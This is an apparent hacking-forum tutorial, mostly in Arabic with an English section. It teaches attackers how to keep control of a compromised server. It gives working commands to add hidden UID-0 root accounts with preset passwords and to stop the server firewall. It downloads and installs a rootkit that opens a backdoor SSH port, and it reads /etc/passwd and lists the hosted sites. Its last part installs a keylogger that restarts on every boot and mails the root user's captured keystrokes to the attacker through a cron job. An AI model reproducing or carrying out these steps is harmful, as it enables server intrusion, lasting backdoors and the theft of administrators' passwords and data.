اليوم حنتكلم عن الروت كيت للضمان للرجوع الى السيرفر
اولا:
In this tutorial you will be learning :
Create a new User with Root PrivilegeClosing Server's FirewallSave Root if Password Changed Or User got Deleted Requirments : - rooted server with ssh access - Putty - Tools (Provided at the end of Topic) Chapter 1 : Connecting with Putty
All we have to do here is Just
1) Open Putty 2) Enter Server IP and Port 3) Connect 4) Type username and Pass
Here We created a user called 'hackforums' with password 'hf300!' now lets Logout and Login as 'hackforums'
now lets type :
Code:
whoami
when you see 'root' then we have successfully added new root user Chapter 2 (Saving our Root)
Now after we Login to ssh We have to close the firewall of the Server, Just by typing :
Code:
/etc/init.d/ipaliases stop
Now we have to Upload the 'shv5.zip'
Now what does this zip do ? It Simply Add new ssh Connection with new root and new Connection Port
P.S. there are 3 ways to Save Root I will only be teaching only one in this Tutorial
Okey now we have to upload shv5.zip by using this Command :
Code:
wget http://site.com/shv5.zip
this will download file to Server .. Now after we download it we will unzip it by using this command :
Code:
unzip shv5.zip
Now after we unzip it we have to Enter the shv5 dir by typing :
Code:
cd shv5
and changing chmod to setup file to 4577 :
Code:
chmod 4755 setup
./setuphackforums754 Run Command - Filename - Username for new connection - ssh Port
And Now we Are done just relax your back till it finish. Now after it finished you may get an Error .. just ignore it and close putty and Open it again with new Port number and Username and Enjoy ^.^
Shout Outs :
- ๖ۣۜΗ α x O r ♥ - -DownFall - BeggfoMercy - Joomlafkr
امر تحرير به الكثير من المزايا لكنه اصعب من السابق
valiasesالمهم نحدد
ls -la /etc/valiases
ls
معرفة المواقع اللي على السيرفر مع اليوزر
ls /var/named
ls
معرفة جميع المواقع اللي على السيرفر
valiasesالمهم نحدد
ls /usr/local/psa/home/vhosts/
ls
معرفة جميع المواقع على السيرفر
perl xxxx.pl
perl
تشغيل البيرل
cat /etc/passwd
ابحث عن bash
cat
امر استخراج حسابات الشل
اكتب الامر التالي لاضافه يوزر بصلاحيات الروت ومضاف الى مجموعه الروت : /usr/sbin/useradd -o -u 0 -g 0 aljyyosh -p adminR00t
تفاصيل الامر
طبعا اليوزراللي هو روت: aljyyosh والباسورد : adminR00t
-o : لاستخدام تغيرات مع الامر -u : لاضافته الى مجموعه اليوزر ذات رقم 0 ( الي هي الروت ) -g : القروب او المجموعه ذات رقم 0 يعني مجموعه الروت ايضا . ---------------- ونجي بامر ثاني نفس الامر الاول . ايضا تقدر عن طريق هذا الامر:
/usr/sbin/useradd -o -u 0 aljyyosh
بعدين تدخل لهذا المستخدم باسورد يعني تضيف باسوورد جديد للمستخدم واذا تبي تغير باسوورد يوزر كذا بعد بالطريقه التاليه: passwd aljyyosh
بعدين بيطلع لك الرساله التاليه: New UNIX password: تكتب باسوورد جديد ولازم يكوون صعب ومعقد (:
بعدين تطلع لك رساله زي كذا يعني ادخلها مره ثانيه: Retype new UNIX password: يعني اعد ادخال كلمه المرور اعد كتابتها ,, بيعطيك الرساله التاليه : Changing password for user aljyyosh. passwd: all authentication tokens updated successfully. ومبرووك عليك صلاحيات مستخدم روت جديده (:
تحية لكم ياأعضاء وزوار منظمة الهكر العربى ، نسأل الله أن تكونوا على خير حال
عودة من جديد بمواضيع مميزة
موضوعنا اليوم يتناول تحميل ملف كيلوجر على السيرفر ووصول التبليغ على الإيميل لنتابع
في البداية نقوم بتنفيذ الأوامر التالية :
PHP Code: get http://logkeys.googlecode.com/files/logkeys-0.1.1a.tar.gz tar xvzf logkeys-0.1.1a.tar.gz cd logkeys-0.1.1a/ ./configure make make install بكذا نكون ثبتنا الكيلوجر على السيرفر وانتهينا من جزء كبير من الشغل الان بدنا نعمل انشاء لملف اللوج اللي راح يتم وضع كل ما يكتبه الروت فيه كالتالي :
PHP Code: touch /home/the user that u have a cpanel on it/public_html/root.log cd /home/the user that u have a cpanel on it/public_html/ chmod 777 root.log خطوة تغيير التصاريح من اهم الخطوات في هذه المرحلة
rc.local تمام الان احنا بدنا الروت كيت يشتغل في كل مرة يصير ريستارت للسيرفر وما يوقف لازم نعدل على الملف
PHP Code: pico /root/rc.local بعدين قم باضافه الكود التالي
PHP Code: logkeys --start ---us-keymap --output=/home/the user that u have a cpanel on it/public_html/root.log --device=event4 طبعا ضع هذا الكود قبل نهايه الملف اي قبل exit0
الان طبق الامر التالي ..
PHP Code: logkeys --start --output /home/the user that u have a cpanel on it/public_html/root.log لان كل شئ تم ... صار الكيلوجر شغال وكمان كل ما يعمل ريستارت الكيلوجر بيشتغل
الان بدنا نروح للمرحلة الاخيرة وهي عمليه انو يوصلك الباس للايميل وهذي سهله جدا فقط تروح للموقع اللي الك عليه سي بنل بعدين cron job تدخل على بعدين تضع الإيميل تبعك وتكتب الامر التالي
PHP Code: cat /home/the user that u have a cpanel on it/public_html/root.log ومبروك عليك كل ما يكتبه الروت والهكر الموجود على السيرفر بتسحب ثغرات وايضا بتسحب ايميلات وكل شئ